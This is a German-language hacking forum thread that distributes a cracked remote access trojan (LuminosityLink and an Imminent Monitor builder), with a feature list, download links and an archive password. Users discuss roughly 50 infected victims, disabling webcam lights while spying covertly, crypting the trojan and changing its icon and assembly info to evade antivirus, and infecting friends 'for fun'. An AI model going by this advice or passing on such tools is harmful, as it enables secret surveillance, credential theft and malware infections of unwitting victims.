69 Antworten in diesem Thema

[Crap]

Deleted

[Elite Soldier]

Incredibly Stable, Effective and Reliable!
[+]Remote Desktop, Remote Webcam, and Client Manager
[+]Fast Reverse SOCKS4/5 Proxy
[+]System Wide Ring3 Rootkit (x86 Processes) With Process Watchdog
[+]Advanced Process, File, and Startup Persistence
[+]Powerful Heuristic-Based Bot Killer (Anti-Malware)
[+]Blacklist Software and Processes. Luminosity removes them!
[+]SmartLogger (Logs all Keystrokes, - Specify certain programs to record separately)
[+]Download Manager - Resume/Pause/Cancel Transfers, Proper File Queue, Organized well
[+]File Grabber - Search for file on client, and queue it for download. Can search certain process directories and much more!
[+]Google Chrome, FireFox, IE, Opera, Safari, FileZila, and Win Serial Key Recovery
[+]File Guard - Guard Executable Files (Other RATs, keyloggers, etc) - Takes care of Undetection, Persistence, and Startup!
[+]Crypto Currency Miner - Injects miner files.
[+]Website Visitor - 4 View Methods - Mute Audio
[+]Client Info - Manage and Grab Info Regarding Clients
[+]Torrent Seeder
[+]Extensive On-Join Commands | Client ID/Version/Client Name |
[+]HTTP Control - Send Commands via Webpage Encrypted
[+]Remote Scripting (HTML/VBS/BATCH)
[+]Block installation and use of any specified software
[+]Tons more features...And more being added!

Instructions
Run LuminosityLink Server by 0x22 to establish a fake connection
Run LuminosityLink to start the program.

SCAN archive no crypted :

Please Login HERE or Register HERE to see this link!

Scan Analysis Binaries :

1-

Please Login HERE or Register HERE to see this link!

2-

Please Login HERE or Register HERE to see this link!

 

[addit]VORSICHT VIRUS! / FILE INFECTED![/addit]
 
DOWNLOAD:

Please Login HERE or Register HERE to see this link!

RAR PASSWORD: Algeria

[yq8]

Soweit ich weiß bei .net immer Self-Inject.

[Cube]

Soweit ich weiß bei .net immer Self-Inject.

@eXaIT

Wie der Kollege yq8 schon betont hat, ist es bei .Net üblich selfinjection zu wählen.

Desweiteren ist es am schlausten bei einem Rat, welches man crypten möchte, lediglich die Connectioninfos einzutragen.

Weder Autostart, noch Icon, oder sonst irgendetwas.

ALLE anderen Optionen sollten beim Crypter getroffen werden!

 

Grüße

Cube

[eXalT]

@eXaIT

Wie der Kollege yq8 schon betont hat, ist es bei .Net üblich selfinjection zu wählen.

Desweiteren ist es am schlausten bei einem Rat, welches man crypten möchte, lediglich die Connectioninfos einzutragen.

Weder Autostart, noch Icon, oder sonst irgendetwas.

ALLE anderen Optionen sollten beim Crypter getroffen werden!

 

Grüße

Cube

Danke Für die Info. Hab jetzt ca. 50 Vics und das RAT läuft noch extrem flüssig. Allerdings funktioniert bei mir das Plugin nicht, welches die Lampe/LED der Webcam ausschaltet, wenn man die webcam remotet. Einer ne Ahnung wie man das fixxen kann?

[yq8]

Die Plugins machen evtl wegen der geupdateten version der ClientPlugin.dll Probleme.

Hat mir ein anderer Reverser mitgeteilt, ein fix ist mir nicht bekannt, evtl eine ClientPlugin.dll aus einer älteren Imminent Monitor Version verwenden[?]

[holz96]

Auch nochmal vielen Dank an den Cracker.

Ein Verbesserungsvorschlag für den Builder:

Ihn vielleicht so erweitern, dass man Einstellungsprofile anlegen kann? Es ist etwas nervig immer alles neu einzugeben

[Bypass]

Wenn ich die Webcam von einem andere öffne, wird er es bemerken? Weil normalerweise sollte er es durch das Plugin mit der Webcam nicht bemerken 

[notfound]

Hey,

 

Ich glaube das es auf die Webcam ankommt.

Bei 80% meiner Vics leuchtet die Webcam nicht, aber vereinzelt schon.

Probier es einfach

 

 

Greetz

notfound

[Bypass]

Vic ist schon wieder einfach aus meiner Liste verschwunden, weil ich nicht die Assembly Settings bearbeiten kann. 

Ich denke dann macht es 0 sinn den RAT zu benutzen, wenn da bei eigenschaften Microsoft Corporation etc steht, und die Datei sowieso von Microsoft erkannt und gelöscht wird.

[notfound]

Also ich habe keine Ahnung, wie yq8 den gecrackten Builder dort geschrieben hat.

 

An alle, die einen Server vom original IM brauchen, sollen mich PMen und mir folgende Infos senden: 

- IP zum Host

- Port der verwendet werden soll

- Funktionen etc.

 

 

 

Greetz

notfound

 

//EDIT:

 

Ungecrypteter IM Server hat 13 Detections: 

Please Login HERE or Register HERE to see this link!

Bearbeitet von notfound, 09 March 2015 - 21:34 Uhr.

[ice]

Vic ist schon wieder einfach aus meiner Liste verschwunden, weil ich nicht die Assembly Settings bearbeiten kann. 

Ich denke dann macht es 0 sinn den RAT zu benutzen, wenn da bei eigenschaften Microsoft Corporation etc steht, und die Datei sowieso von Microsoft erkannt und gelöscht wird.

 

Das ist doch total unwichtig, die entscheidenden Assembly Infos werden, wie Cube bereits beantwortet hat, im Crypter getroffen. 
Ich vermute deine Datei wird von Windows erkannt, weil sie detected ist, und genau dazu ist der Crypter da ;o)

Bearbeitet von ice, 09 March 2015 - 21:29 Uhr.

[notfound]

Das ist doch total unwichtig, die entscheidenden Assembly Infos werden, wie Cube bereits beantwortet hat, im Crypter getroffen. 
Ich vermute deine Datei wird von Windows erkannt, weil sie detected ist, und genau dazu ist der Crypter da ;o)

Also ich gehe mal davon aus, dass er das File gecryptet hat^^

 

Wenn ja, change die Assembly und das Icon einfach - Hierzu RessourceHacker oder andere Tools benutzen.

 

 

Greetz

notfound

[yq8]

Update:

Da sich ja jeder hier über meinen Builder beschwert hab ich mich kurz rangesetzt und ihn gefixt.
Folgende Bugs sind jetzt behoben:

- Assembly Info werden jetzt korrekt geupdated.
- Icon wird angezeigt wenn ausgewählt

Download Builder v1.1:
 

http://puu.sh/gtwhA/9980df948c.zip

Bearbeitet von yq8, 09 March 2015 - 21:56 Uhr.

[holz96]

Könntest du vielleicht noch irgendwann eine Funktion mit speicherbaren Profilen hinzufügen? Das wäre richtig gut

[gtawelt]

empfehlt ihr dieses rat besser zu kaufen?

ich will nur gelegentlich mal paar freunde infecten zum spass

[notfound]

Ja, im Prinzip schon.

Ich habe diese RAT gekauft und sie ist echt preiswert und gut.

 

Für deinen Fall aber eher nicht, da du ja einfach den Crack benutzen kannst.

 

Greetz

notfound

[Framerater]

 

Update:

Da sich ja jeder hier über meinen Builder beschwert hab ich mich kurz rangesetzt und ihn gefixt.
Folgende Bugs sind jetzt behoben:

- Assembly Info werden jetzt korrekt geupdated.
- Icon wird angezeigt wenn ausgewählt

Download Builder v1.1:
 

http://puu.sh/gtwhA/9980df948c.zip

3. Tools eintragen

• 3.2 Zu jedem eingetragenen Tool muss ebenfalls ein Virustotal- oder Elementscanner-Check vorliegen.
• 3.3 Wir übernehmen keine Haftung für mögliche Schäden die durch Tools verursacht werden können.

[Bypass]

 

Update:

Da sich ja jeder hier über meinen Builder beschwert hab ich mich kurz rangesetzt und ihn gefixt.
Folgende Bugs sind jetzt behoben:

- Assembly Info werden jetzt korrekt geupdated.
- Icon wird angezeigt wenn ausgewählt

Download Builder v1.1:
 

http://puu.sh/gtwhA/9980df948c.zip

Ich bin bei dem Builder skeptisch, wegen der Beschreibung; 

 

 

Hat die neue version vom Builder jmd schon tested?

Bearbeitet von Bypass, 12 March 2015 - 01:24 Uhr.

[zerobound]

was ist das MinerFile bei dem Crypto ding ?

 

 

und wie sind die Hashraten bei euch im durchschnitt? [llitecoin]

Bearbeitet von zerobound, 12 March 2015 - 06:00 Uhr.

[Bad Grandpa]

@yq8  bitte dein Download zum Builder fixen Danke

[Crap]

@Bypass : Manche Webcams verwenden ein Licht welches Software bedingt leuchtet(häufig bei eingebauten Webcams). Es gibt auch Webcams bei den das Licht Hardware bedingt leuchtet.

Software bedingtes Licht wird durch das Plugin deaktiviert, Hardware bedingtes Licht hingegen nicht.

LG
Crap